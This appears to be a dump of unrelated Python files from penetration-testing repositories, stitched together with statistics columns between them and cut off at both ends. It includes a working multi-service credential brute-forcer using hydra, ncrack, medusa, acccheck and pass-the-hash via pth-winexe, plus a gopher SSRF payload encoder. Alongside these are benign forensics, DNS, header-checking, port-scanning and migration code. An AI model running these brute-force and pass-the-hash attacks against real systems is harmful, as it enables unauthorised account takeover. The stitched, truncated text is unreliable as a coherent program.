NMAP = "nmap -p 445 --script smb-os-discovery %s | grep OS:" % target
try:
nmap_results = subprocess.check_output(NMAP, shell=True)
if not "Windows" in nmap_results:
printStd("Skipping: hash login not accessible")
return False
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % NMAP)
return False
except subprocess.CalledProcessError as ex:
# grep exits 1 when no "OS:" line matched -- treat as "not Windows";
# any other exit status is unexpected and re-raised.
if ex.returncode != 1:
raise Exception
printStd("Skipping: hash login not accessible")
return False
except Exception as e:
printErr("Unable to discover target compatibility:\n\t%s\n\n%s" % (NMAP, e))
return False
return True
# ------------------------------------
# Scans
# ------------------------------------
# Light NMAP
# ========================
def conductLightNmap(target):
# Run a default TCP nmap scan plus a UDP probe of port 161 (SNMP)
# against the target, echo the TCP results, and return the parsed
# {service: [ports]} map.  Exits the program if the scan cannot run.
printStdSpecial("Investigating %s" % target)
# NOTE(review): NAME is unused.
NAME = "nmap_light"
# Conduct Scan #
TCPSCAN = "nmap %s" % target
UDPSCAN = "nmap -sU -p 161 %s" % target
tcpResults = ""
udpResults = ""
try:
tcpResults = subprocess.check_output(TCPSCAN, shell=True)
udpResults = subprocess.check_output(UDPSCAN, shell=True)
print "%s" % tcpResults
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % TCPSCAN)
except Exception as e:
printErr("Unable to conduct light nmap scan:\n\t%s\n\n%s" % (TCPSCAN, e))
sys.exit(2)
# Filter Results #
services = parseNmapScan("%s\n%s" % (tcpResults, udpResults))
return services
# ========================
# FTP
# ========================
def ftp(target, ports, userpasses):
# Try each user:pass pair against the target's FTP service with hydra;
# a Ctrl-C skips the remaining pairs for this service only.
printStdSpecial("Checking FTP")
for userpass in userpasses:
HYDRA = "timeout %s hydra -l %s -p %s ftp://%s 2>&1" % (TIMECAP, userpass.split(":")[0], userpass.split(":")[1], target)
try:
hydraResults = subprocess.check_output(HYDRA, shell=True)
if "valid password found" in hydraResults:
for line in hydraResults.splitlines():
if "host" in line:
printPlus(line)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % HYDRA)
break
except Exception:
printErr("Unable to conduct FTP Brute:\n\t%s" % HYDRA)
# ========================
# SSH
# ========================
def ssh(target, ports, userpasses):
# Same hydra loop as ftp(), over ssh:// with 4 parallel tasks (-t 4).
printStdSpecial("Checking SSH")
for userpass in userpasses:
HYDRA = "timeout %s hydra -l %s -p %s ssh://%s -t 4 2>&1" % (TIMECAP, userpass.split(":")[0], userpass.split(":")[1], target)
try:
hydraResults = subprocess.check_output(HYDRA, shell=True)
if "valid password found" in hydraResults:
for line in hydraResults.splitlines():
if "host" in line:
printPlus(line)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % HYDRA)
break
except Exception:
printErr("Unable to conduct SSH Brute:\n\t%s" % HYDRA)
# ========================
# RDP
# ========================
def rdp(target, ports, userpasses):
# RDP guesses via ncrack, tried both without and with TLS (-g ssl=yes).
printStdSpecial("Checking RDP")
for userpass in userpasses:
NCRACK = "timeout %i ncrack -vv --user %s --pass %s rdp://%s" % (TIMECAP, userpass.split(":")[0], userpass.split(":")[1], target)
NCRACK_SSL = "%s -g ssl=yes" % NCRACK
try:
ncrackResults = "%s%s" % (subprocess.check_output(NCRACK, shell=True), subprocess.check_output(NCRACK_SSL, shell=True))
if "Discovered credentials" in ncrackResults:
printPlus(userpass)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % NCRACK)
break
except Exception:
printErr("Unable to conduct RDP Brute:\n\t%s" % NCRACK)
# ========================
# SMB
# ========================
def smb(target, ports, userpasses):
# SMB guesses via acccheck; on Windows hosts the same pairs are then
# replayed as pass-the-hash attempts through pth-winexe.
printStdSpecial("Checking SMB")
for userpass in userpasses:
ACCCHECK = "timeout %i acccheck -t %s -u %s -p %s -v" % (TIMECAP, target, userpass.split(":")[0], userpass.split(":")[1])
try:
acccheck_results = subprocess.check_output(ACCCHECK, shell=True)
if "SUCCESS" in acccheck_results:
printPlus(userpass)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % ACCCHECK)
break
except Exception:
printErr("Unable to conduct SMB brute:\n\t%s" % ACCCHECK)
if not isWindows(target):
return
printStd("Checking Pass the Hash")
for userpass in userpasses:
WINEXE = "timeout %i pth-winexe -U %s%%%s --uninstall //%s whoami 2>&1" % (TIMECAP, userpass.split(":")[0], userpass.split(":")[1], target)
try:
winexe_results = subprocess.check_output(WINEXE, shell=True)
if not "ERROR" in winexe_results:
# On success print the ready-to-use interactive command line.
printPlus("pth-winexe -U %s%%%s --uninstall //%s cmd" % (userpass.split(":")[0], userpass.split(":")[1], target))
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % WINEXE)
break
except Exception:
printErr("Unable to conduct PTH brute:\n\t%s" % WINEXE)
# ========================
# MSSQL
# ========================
def ms_sql(target, ports, userpasses):
# MS-SQL guesses via medusa (-M mssql), stopping on first hit (-f).
printStdSpecial("Checking MS-SQL")
for userpass in userpasses:
MEDUSA = "timeout %i medusa -h %s -u %s -p %s -M mssql -L -f 2>&1" % (TIMECAP, target, userpass.split(":")[0], userpass.split(":")[1])
try:
medusa_results = subprocess.check_output(MEDUSA, shell=True)
if "ACCOUNT FOUND" in medusa_results:
printPlus(userpass)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % MEDUSA)
break
except Exception:
printErr("Unable to conduct MS-SQL brute:\n\t%s" % MEDUSA)
# ========================
# MySQL
# ========================
def mysql(target, ports, userpasses):
# MySQL guesses via medusa (-M mysql), stopping on first hit (-f).
printStdSpecial("Checking MySQL")
for userpass in userpasses:
MEDUSA = "timeout %i medusa -h %s -u %s -p %s -M mysql -L -f 2>&1" % (TIMECAP, target, userpass.split(":")[0], userpass.split(":")[1])
try:
medusa_results = subprocess.check_output(MEDUSA, shell=True)
if "ACCOUNT FOUND" in medusa_results:
printPlus(userpass)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % MEDUSA)
break
except Exception:
printErr("Unable to conduct MySQL brute:\n\t%s" % MEDUSA)
# ========================
# SMTP
# ========================
def smtp(target, ports, userpasses):
# SMTP guesses via hydra; a Ctrl-C skips the remaining pairs.
printStdSpecial("Checking SMTP")
for userpass in userpasses:
HYDRA = "timeout %i hydra -l %s -p %s smtp://%s 2>&1" % (TIMECAP, userpass.split(":")[0], userpass.split(":")[1], target)
try:
hydra_results = subprocess.check_output(HYDRA, shell=True)
if "valid password found" in hydra_results:
for line in hydra_results.splitlines():
if "host" in line:
printPlus(line)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % HYDRA)
break
except Exception:
printErr("Unable to conduct SMTP brute:\n\t%s" % HYDRA)
# ========================
# POP3
# ========================
def pop3(target, ports, userpasses):
# POP3 guesses via hydra; same loop shape as smtp().
printStdSpecial("Checking POP3")
for userpass in userpasses:
HYDRA = "timeout %i hydra -l %s -p %s pop3://%s 2>&1" % (TIMECAP, userpass.split(":")[0], userpass.split(":")[1], target)
try:
hydra_results = subprocess.check_output(HYDRA, shell=True)
if "valid password found" in hydra_results:
for line in hydra_results.splitlines():
if "host" in line:
printPlus(line)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % HYDRA)
break
except Exception:
printErr("Unable to conduct POP3 brute:\n\t%s" % HYDRA)
# ========================
# IMAP
# ========================
def imap(target, ports, userpasses):
# IMAP guesses via hydra; same loop shape as smtp().
printStdSpecial("Checking imap")
for userpass in userpasses:
HYDRA = "timeout %i hydra -l %s -p %s imap://%s 2>&1" % (TIMECAP, userpass.split(":")[0], userpass.split(":")[1], target)
try:
hydra_results = subprocess.check_output(HYDRA, shell=True)
if "valid password found" in hydra_results:
for line in hydra_results.splitlines():
if "host" in line:
printPlus(line)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % HYDRA)
break
except Exception:
printErr("Unable to conduct IMAP brute:\n\t%s" % HYDRA)
# ========================
# ========================
# ------------------------------------
# Main
# ------------------------------------
# Map of nmap service names to the brute-force module handling them;
# dispatchModules() consults this table.
KNOWN_SERVICES = {
"ftp" : ftp,
"ssh" : ssh,
"ms-wbt-server" : rdp,
"netbios-ssn" : smb,
"ms-sql-s" : ms_sql,
"mysql" : mysql,
"smtp" : smtp,
"pop3" : pop3,
"imap" : imap
}
def main(argv):
# Validate the two positional arguments (credentials and targets --
# each either a literal value or a file of values), then scan each
# target and dispatch the discovered services to the brute modules.
# NOTE(review): the argv parameter is unused; sys.argv is read directly.
if len(sys.argv) != 3:
printUsage()
sys.exit(2)
# Validate Userpasses
USERPASSES = []
if os.path.isfile(sys.argv[1]):
with open(sys.argv[1]) as f:
for line in f:
# Malformed lines are reported and skipped, not fatal.
if not validateUserpass(line.strip()):
printErr("Invalid userpass format: %s" % line.strip())
continue
USERPASSES.append(line.strip())
else:
if not validateUserpass(sys.argv[1]):
printErr("Invalid userpass format: %s" % sys.argv[1])
printUsage()
sys.exit(2)
USERPASSES = [sys.argv[1]]
# Validate Targets
TARGETS = []
if os.path.isfile(sys.argv[2]):
with open(sys.argv[2]) as f:
for line in f:
if not validateIp(line.strip()):
printErr("Invalid target format: %s" % line.strip())
continue
TARGETS.append(line.strip())
else:
if not validateIp(sys.argv[2]):
printErr("Invalid target format: %s" % sys.argv[2])
printUsage()
sys.exit(2)
TARGETS = [sys.argv[2]]
# Begin
printHeader()
try:
for target in TARGETS:
SERVICES = conductLightNmap(target)
dispatchModules(target, SERVICES, USERPASSES)
except KeyboardInterrupt:
print "\n\nExiting.\n"
sys.exit(1)
# Standard script entry guard.
if __name__ == "__main__":
main(sys.argv[1:])
| 32.545652 | 147 | 0.52897 |
Tricks-Web-Penetration-Tester | import urllib.parse
payload = input("insert payload:\n")
# Append CRLF-terminated "quit" so the injected protocol session on the
# target service closes cleanly after the payload runs.
cmd=payload+"\r\nquit\r\n\r\n"
# Emit a gopher:// SSRF URL pointing at localhost:1211; the payload is
# URL-encoded twice because it is decoded once by the proxying service
# and once more when the gopher URL itself is parsed.
print("gopher://localhost:1211/_",end="")
print(urllib.parse.quote(urllib.parse.quote(cmd)))
cybersecurity-penetration-testing | import os
import sys
import argparse
import logging
import jinja2
import pypff
import unicodecsv as csv
from collections import Counter
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = 'This scripts handles processing and output of PST Email Containers'
# Output directory for report artefacts; set from the CLI args in __main__.
output_directory = ""
# 7 x 24 heatmap counters: one {hour(1-24): count} dict per weekday,
# filled by folderReport() and written out by dateReport().
# NOTE(review): xrange is Python-2 only.
date_dict = {x:0 for x in xrange(1, 25)}
date_list = [date_dict.copy() for x in xrange(7)]
def main(pst_file, report_name):
"""
The main function opens a PST and calls functions to parse and report data from the PST
:param pst_file: A string representing the path to the PST file to analyze
:param report_name: Name of the report title (if supplied by the user)
:return: None
"""
logging.debug("Opening PST for processing...")
pst_name = os.path.split(pst_file)[1]
# pypff handles the PST container format; traversal starts at the root folder
opst = pypff.open(pst_file)
root = opst.get_root_folder()
logging.debug("Starting traverse of PST structure...")
folderTraverse(root)
logging.debug("Generating Reports...")
# The traversal left per-folder CSVs plus the text corpora the report
# helpers below consume.
top_word_list = wordStats()
top_sender_list = senderReport()
dateReport()
HTMLReport(report_name, pst_name, top_word_list, top_sender_list)
def makePath(file_name):
    """
    The makePath function returns the absolute path of *file_name*
    inside the module-level output_directory.
    :param file_name: A string representing a file name
    :return: A string representing the path to a specified file
    """
    joined = os.path.join(output_directory, file_name)
    return os.path.abspath(joined)
def folderTraverse(base):
"""
The folderTraverse function walks through the base of the folder and scans for sub-folders and messages
:param base: Base folder to scan for new items within the folder.
:return: None
"""
# Depth-first: recurse into every sub-folder that itself has children,
# and scan every sub-folder for messages regardless.
for folder in base.sub_folders:
if folder.number_of_sub_folders:
folderTraverse(folder) # Call new folder to traverse:
checkForMessages(folder)
def checkForMessages(folder):
"""
The checkForMessages function reads folder messages if present and passes them to the report function
:param folder: pypff.Folder object
:return: None
"""
logging.debug("Processing Folder: " + folder.name)
# Flatten every message into a plain dict, then hand the whole folder's
# worth to folderReport() for CSV + corpus output.
message_list = []
for message in folder.sub_messages:
message_dict = processMessage(message)
message_list.append(message_dict)
folderReport(message_list, folder.name)
def processMessage(message):
    """
    The processMessage function flattens the interesting fields of a
    message into a plain dictionary to simplify later reporting.
    :param message: pypff.Message object
    :return: A dictionary with message fields (values) and their data (keys)
    """
    fields = (
        ("subject", message.subject),
        ("sender", message.sender_name),
        ("header", message.transport_headers),
        ("body", message.plain_text_body),
        ("creation_time", message.creation_time),
        ("submit_time", message.client_submit_time),
        ("delivery_time", message.delivery_time),
        ("attachment_count", message.number_of_attachments),
    )
    return dict(fields)
def folderReport(message_list, folder_name):
"""
The folderReport function generates a report per PST folder
:param message_list: A list of messages discovered during scans
:folder_name: The name of an Outlook folder within a PST
:return: None
"""
if not len(message_list):
# NOTE(review): this actually means "folder contains no messages",
# not that a single message was empty.
logging.warning("Empty message not processed")
return
# CSV Report
fout_path = makePath("folder_report_" + folder_name + ".csv")
fout = open(fout_path, 'wb')
header = ['creation_time', 'submit_time', 'delivery_time',
'sender', 'subject', 'attachment_count']
csv_fout = csv.DictWriter(fout, fieldnames=header, extrasaction='ignore')
csv_fout.writeheader()
csv_fout.writerows(message_list)
fout.close()
# HTML Report Prep: append bodies/senders to the shared corpora and
# bump the weekday/hour heatmap counters for each timestamp.
global date_list # Allow access to edit global variable
body_out = open(makePath("message_body.txt"), 'a')
senders_out = open(makePath("senders_names.txt"), 'a')
for m in message_list:
if m['body']:
body_out.write(m['body'] + "\n\n")
if m['sender']:
senders_out.write(m['sender'] + '\n')
# Creation Time
day_of_week = m['creation_time'].weekday()
hour_of_day = m['creation_time'].hour + 1
date_list[day_of_week][hour_of_day] += 1
# Submit Time
day_of_week = m['submit_time'].weekday()
hour_of_day = m['submit_time'].hour + 1
date_list[day_of_week][hour_of_day] += 1
# Delivery Time
day_of_week = m['delivery_time'].weekday()
hour_of_day = m['delivery_time'].hour + 1
date_list[day_of_week][hour_of_day] += 1
body_out.close()
senders_out.close()
def wordStats(raw_file="message_body.txt"):
"""
The wordStats function reads and counts words from a file
:param raw_file: The path to a file to read
:return: A list of word frequency counts
"""
word_list = Counter()
# NOTE(review): the file handle is never closed (relies on GC).
for line in open(makePath(raw_file), 'r').readlines():
for word in line.split():
# Prevent too many false positives/common words
if word.isalnum() and len(word) > 4:
word_list[word] += 1
return wordReport(word_list)
def wordReport(word_list):
"""
The wordReport function counts a list of words and returns results in a CSV format
:param word_list: A list of words to iterate through
:return: None or html_report_list, a list of word frequency counts
"""
if not word_list:
logging.debug('Message body statistics not available')
return
# Full frequency table goes to CSV; only the top 10 are returned for
# the HTML dashboard.
fout = open(makePath("frequent_words.csv"), 'wb')
fout.write("Count,Word\n")
for e in word_list.most_common():
if len(e) > 1:
fout.write(str(e[1]) + "," + str(e[0]) + "\n")
fout.close()
html_report_list = []
for e in word_list.most_common(10):
html_report_list.append({"word": str(e[0]), "count": str(e[1])})
return html_report_list
def senderReport(raw_file="senders_names.txt"):
"""
The senderReport function reports the most frequent_senders
:param raw_file: The file to read raw information
:return: html_report_list, a list of the most frequent senders
"""
# Each corpus line is one sender name (newline kept, so no "\n" is
# appended when writing the CSV rows below).
sender_list = Counter(open(makePath(raw_file), 'r').readlines())
fout = open(makePath("frequent_senders.csv"), 'wb')
fout.write("Count,Sender\n")
for e in sender_list.most_common():
if len(e) > 1:
fout.write(str(e[1]) + "," + str(e[0]))
fout.close()
html_report_list = []
# Top 5 senders feed the HTML dashboard chart.
for e in sender_list.most_common(5):
html_report_list.append({"label": str(e[0]), "count": str(e[1])})
return html_report_list
def dateReport():
"""
The dateReport function writes date information in a TSV report. No input args as the filename
is static within the HTML dashboard
:return: None
"""
# Dump the global 7x24 heatmap counters as day/hour/value rows
# (days re-based to 1..7 for the dashboard).
csv_out = open(makePath("heatmap.tsv"), 'w')
csv_out.write("day\thour\tvalue\n")
for date, hours_list in enumerate(date_list):
for hour, count in hours_list.items():
to_write = str(date+1) + "\t" + str(hour) + "\t" + str(count) + "\n"
csv_out.write(to_write)
csv_out.flush()
csv_out.close()
def HTMLReport(report_title, pst_name, top_words, top_senders):
    """
    The HTMLReport function generates the HTML report from a Jinja2 Template.

    :param report_title: A string representing the title of the report
    :param pst_name: A string representing the file name of the PST
    :param top_words: A list of the top 10 words
    :param top_senders: A list of the top 10 senders
    :return: None
    """
    # Use context managers: the original left both file handles open
    # (the template handle was never closed at all).
    with open("stats_template.html", 'r') as template_file:
        open_template = template_file.read()
    html_template = jinja2.Template(open_template)
    context = {"report_title": report_title, "pst_name": pst_name,
               "word_frequency": top_words, "percentage_by_sender": top_senders}
    new_html = html_template.render(context)
    with open(makePath(report_title + ".html"), 'w') as html_report_file:
        html_report_file.write(new_html)
if __name__ == "__main__":
    # Command-line entry point for the PST indexer.
    # NOTE(review): the version= keyword to ArgumentParser was removed in
    # Python 3.3; this script targets the legacy Python 2 argparse API.
    parser = argparse.ArgumentParser(version=str(__version__), description=__description__,
                                     epilog='Developed by ' + __author__ + ' on ' + __date__)
    parser.add_argument('PST_FILE', help="PST File Format from Microsoft Outlook")
    parser.add_argument('OUTPUT_DIR', help="Directory of output for temporary and report files.")
    parser.add_argument('--title', help='Title of the HTML Report. (default=PST Report)',
                        default="PST Report")
    parser.add_argument('-l', help='File path of log file.')
    args = parser.parse_args()
    output_directory = os.path.abspath(args.OUTPUT_DIR)
    if not os.path.exists(output_directory):
        os.makedirs(output_directory)
    # -l is treated as a directory: it is created if missing and the log
    # file name is appended to it.
    if args.l:
        if not os.path.exists(args.l):
            os.makedirs(args.l)
        log_path = os.path.join(args.l, 'pst_indexer.log')
    else:
        log_path = 'pst_indexer.log'
    logging.basicConfig(filename=log_path, level=logging.DEBUG,
                        format='%(asctime)s | %(levelname)s | %(message)s', filemode='a')
    logging.info('Starting PST_Indexer v.' + str(__version__))
    logging.debug('System ' + sys.platform)
    logging.debug('Version ' + sys.version)
    logging.info('Starting Script...')
    main(args.PST_FILE, args.title)
    logging.info('Script Complete')
| 33.761905 | 107 | 0.64011 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
def child_method():
    """Print a short message identifying this as the child implementation."""
    message = "This is child method()"
    print(message)
| 8.222222 | 32 | 0.609756 |
PenTestScripts | #!/usr/bin/python
# Quick script that attempts to find the reverse DNS info
# from a provided IP range.
import argparse
import os
import socket
import sys
from netaddr import IPNetwork
def cli_parser():
    """Build the option parser, handle the custom help flags, and return
    the (input file, single IP, CIDR range) values chosen by the user."""
    # add_help=False so that -h can be redefined below alongside -? etc.
    parser = argparse.ArgumentParser(
        add_help=False,
        description="DNSReverser takes IP addresses and tries to find its hostname.")
    parser.add_argument(
        "-f", metavar="ips.txt", default=None,
        help="File containing IPs to resolve hostnames for.")
    parser.add_argument(
        "-ip", metavar='192.168.1.1', default=None,
        help="Used to find hostname about a specific IP.")
    parser.add_argument(
        "-cidr", metavar='192.168.1.0/24', default=None,
        help="Used to find hostnames about a specific CIDR range.")
    parser.add_argument(
        '-h', '-?', '--h', '-help', '--help', action="store_true",
        help=argparse.SUPPRESS)
    options = parser.parse_args()
    # Help requested: show usage and bail out before returning anything.
    if options.h:
        parser.print_help()
        sys.exit()
    return options.f, options.ip, options.cidr
def rdns_lookup(ip_address):
    """
    Look up the reverse (PTR) DNS name for ip_address.

    Appends "<ip> <hostname>" to reverse_dns_results.txt on success and
    prints a notice when the address has no PTR record.

    :param ip_address: IP address string (may carry surrounding whitespace)
    :return: None
    """
    try:
        # gethostbyaddr returns (hostname, aliaslist, ipaddrlist).
        reverse_dns = socket.gethostbyaddr(ip_address)[0]
        script_out = ip_address.strip() + ' ' + reverse_dns + '\n'
        with open('reverse_dns_results.txt', 'a') as rev_results:
            rev_results.write(script_out)
    except socket.error:
        # Narrowed from a bare except: socket.error covers herror/gaierror
        # and timeouts, while a bare except would also have swallowed
        # KeyboardInterrupt during long scans.
        print("No Reverse DNS for " + str(ip_address) + ".")
    return
def cidr_net(cidr_range):
    """Wrap the CIDR string in a netaddr IPNetwork so callers can iterate
    over every address in the range."""
    return IPNetwork(cidr_range)
def file_read(input_file):
    """Return every line of input_file (trailing newlines preserved)."""
    with open(input_file, 'r') as handle:
        return handle.readlines()
def title():
    """Clear the terminal and print the scanner banner (Python 2 script)."""
    # Clear the screen
    # NOTE(review): 'clear' assumes a POSIX terminal; no-op/error on Windows.
    os.system('clear')
    print "############################################################"
    print "#                   Reverse DNS Scanner                    #"
    print "############################################################\n"
    print "Starting Reverse DNS Scan...\n"
    return
if __name__ == '__main__':
    # Parse command line options
    cli_file, cli_ip, cli_cidr = cli_parser()
    title()
    # Exactly one of -cidr / -f / -ip must be supplied; any other
    # combination falls through to the error branch below.
    if cli_cidr is not None and cli_file is None and cli_ip is None:
        ip_cidr_list = cidr_net(cli_cidr)
        for ip_add in ip_cidr_list:
            # netaddr yields IPAddress objects; normalise to plain strings.
            ip_add = str(ip_add)
            ip_add = ip_add.strip()
            rdns_lookup(ip_add)
    elif cli_file is not None and cli_cidr is None and cli_ip is None:
        ip_file_input = file_read(cli_file)
        for ip_add_file in ip_file_input:
            ip_add_file = ip_add_file.strip()
            rdns_lookup(ip_add_file)
    elif cli_ip is not None and cli_cidr is None and cli_file is None:
        rdns_lookup(cli_ip)
    else:
        print "[*]ERROR: Please start over and provide a valid input option."
        sys.exit()
    print "\nScan Completed! Check the output file!\n"
| 25.981308 | 85 | 0.572765 |
Hands-On-Penetration-Testing-with-Python | import requests
class Detect_CJ():
    """Probe a URL and report whether the X-Frame-Options anti-clickjacking
    header is present in the response."""

    def __init__(self, target):
        """:param target: URL to probe, e.g. http://host/path"""
        self.target = target

    def start(self):
        """Fetch the target, dump its response headers, and flag the
        presence or absence of X-Frame-Options."""
        try:
            resp = requests.get(self.target)
            headers = resp.headers
            print("\n\nHeaders set are : \n")
            # BUG FIX: dict.iteritems() is Python 2 only and does not exist
            # on requests' headers mapping under Python 3 (the rest of this
            # file already uses Python 3 print() calls); use items().
            for k, v in headers.items():
                print(k + ":" + v)
            if "X-Frame-Options" in headers.keys():
                print("\n\nClick Jacking Header present")
            else:
                print("\n\nX-Frame-Options is missing ! ")
        except Exception as ex:
            print("EXception caught : " + str(ex))
# Example invocation against a local DVWA instance.
obj=Detect_CJ("http://192.168.250.1/dvwa")
obj.start()
| 18.814815 | 46 | 0.642322 |
cybersecurity-penetration-testing | import socket
def get_protnumber(prefix):
    """Map socket-module constants whose names start with prefix to their
    names, keyed by the constant's numeric value."""
    return {getattr(socket, name): name
            for name in dir(socket)
            if name.startswith(prefix)}
# Build value -> name lookup tables for the socket constants.
proto_fam = get_protnumber('AF_')
types = get_protnumber('SOCK_')
protocols = get_protnumber('IPPROTO_')
# Resolve the host for the 'http' service and describe each returned
# 5-tuple (Python 2 print statements).
for res in socket.getaddrinfo('www.thapar.edu', 'http'):
    family, socktype, proto, canonname, sockaddr = res
    print 'Family :', proto_fam[family]
    print 'Type :', types[socktype]
    print 'Protocol :', protocols[proto]
    print 'Canonical name:', canonname
    print 'Socket address:', sockaddr
| 26.7 | 56 | 0.676311 |
cybersecurity-penetration-testing | import threading
import time
import socket, subprocess,sys
import thread
import collections
from datetime import datetime
'''section 1'''
net = raw_input("Enter the Network Address ")
st1 = int(raw_input("Enter the starting Number "))
en1 = int(raw_input("Enter the last Number "))
en1=en1+1
#dic = collections.OrderedDict()
list1= []
net1= net.split('.')
a = '.'
net2 = net1[0]+a+net1[1]+a+net1[2]+a
t1= datetime.now()
'''section 2'''
class myThread(threading.Thread):
    """Worker thread that scans the host-number slice [st, en) of the
    shared /24 network."""

    def __init__(self, st, en):
        # Record the slice of host numbers this worker owns.
        threading.Thread.__init__(self)
        self.st = st
        self.en = en

    def run(self):
        # Delegate to the module-level scan loop for our slice.
        run1(self.st, self.en)
'''section 3'''
def scan(addr):
    """
    Probe TCP port 445 (SMB) on addr.

    :param addr: dotted-quad IP address string
    :return: 1 when the port accepted a connection, None otherwise
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Per-socket timeout instead of socket.setdefaulttimeout(): the old
    # module-wide default silently leaked into every socket created
    # anywhere in the process (including other threads).
    sock.settimeout(1)
    try:
        # connect_ex returns 0 on success instead of raising.
        result = sock.connect_ex((addr, 445))
    finally:
        # Always close -- the original leaked the descriptor on errors.
        sock.close()
    if result == 0:
        return 1
def run1(st1,en1):
    """Scan host numbers [st1, en1) on the shared /24 and record hits.

    Appends live addresses to the module-level list1 and reads the
    module-level net2 prefix.  Python 2 only (xrange).
    """
    for ip in xrange(st1,en1):
        addr = net2+str(ip)
        # scan() returns 1 (truthy) only when port 445 accepted.
        if scan(addr):
            list1.append(addr)
'''section 4'''
# Partition the host range into slices of tn addresses and hand each
# slice to a worker thread (Python 2 script: xrange, print statements).
total_ip =en1-st1
tn =20 # number of ip handled by one thread
total_thread = total_ip/tn
total_thread=total_thread+1
threads= []
try:
    for i in xrange(total_thread):
        #print "i is ",i
        en = st1+tn
        # Clamp the final slice to the end of the requested range.
        if(en >en1):
            en =en1
        thread = myThread(st1,en)
        thread.start()
        threads.append(thread)
        st1 =en
except:
    print "Error: unable to start thread"
print "\tNumber of Threads active:", threading.activeCount()
# Wait for every worker before reporting results.
for t in threads:
    t.join()
print "Exiting Main Thread"
list1.sort()
for k in list1 :
    print k,"-->" "Live"
t2= datetime.now()
total =t2-t1
print "scanning complete in " , total | 21.014085 | 60 | 0.671575 |
cybersecurity-penetration-testing | print"<MaltegoMessage>"
print"<MaltegoTransformResponseMessage>"
print" <Entities>"
def maltego(entity, value, addvalues):
    """Print one Maltego <Entity> element (Python 2 print statements).

    :param entity: entity type suffix, e.g. "ip" -> maltego.ip
    :param value: primary entity value
    :param addvalues: dict of additional field name -> value pairs
    """
    print"    <Entity Type=\"maltego."+entity+"\">"
    print"      <Value>"+value+"</Value>"
    print"      <AdditionalFields>"
    # NOTE(review): the loop variable deliberately reuses (and shadows)
    # the 'value' parameter after it has been printed above; iteritems()
    # makes this Python 2 only.
    for value, item in addvalues.iteritems():
        print"        <Field Name=\""+value+"\" DisplayName=\""+value+"\" MatchingRule=\"strict\">"+item+"</Field>"
    print"      </AdditionalFields>"
    print"    </Entity>"
# Example entity, then close the XML document opened above.
maltego("ip", "127.0.0.1", {"domain": "google.com"})
print"  </Entities>"
print"</MaltegoTransformResponseMessage>"
print"</MaltegoMessage>"
| 24.347826 | 104 | 0.671821 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Cookie Attributes Plugin to assist manual testing"
def run(PluginInfo):
    """OWTF plugin entry point: render a link list of helper resources
    for manual cookie-attribute testing.

    NOTE(review): the resource key is ExternalCookiesAttributes but the
    rendered section title reads "Online Hash Cracking Resources" -- this
    looks like a copy/paste slip from another plugin; confirm the intended
    title before changing it.
    """
    resource = get_resources("ExternalCookiesAttributes")
    Content = plugin_helper.resource_linklist(
        "Online Hash Cracking Resources", resource
    )
    return Content
| 27.153846 | 65 | 0.761644 |
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply: add the addParameter columns to xtreme_server_project."""
        # Adding field 'Project.addParameter_field'
        db.add_column(u'xtreme_server_project', 'addParameter_field',
                      self.gf('django.db.models.fields.TextField')(default='Not Set'),
                      keep_default=False)
        # Adding field 'Project.addParameter'
        db.add_column(u'xtreme_server_project', 'addParameter',
                      self.gf('django.db.models.fields.TextField')(default='Not Set'),
                      keep_default=False)
    def backwards(self, orm):
        """Revert: drop the columns added by forwards()."""
        # Deleting field 'Project.addParameter_field'
        db.delete_column(u'xtreme_server_project', 'addParameter_field')
        # Deleting field 'Project.addParameter'
        db.delete_column(u'xtreme_server_project', 'addParameter')
models = {
u'xtreme_server.form': {
'Meta': {'object_name': 'Form'},
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
},
u'xtreme_server.inputfield': {
'Meta': {'object_name': 'InputField'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
},
u'xtreme_server.learntmodel': {
'Meta': {'object_name': 'LearntModel'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
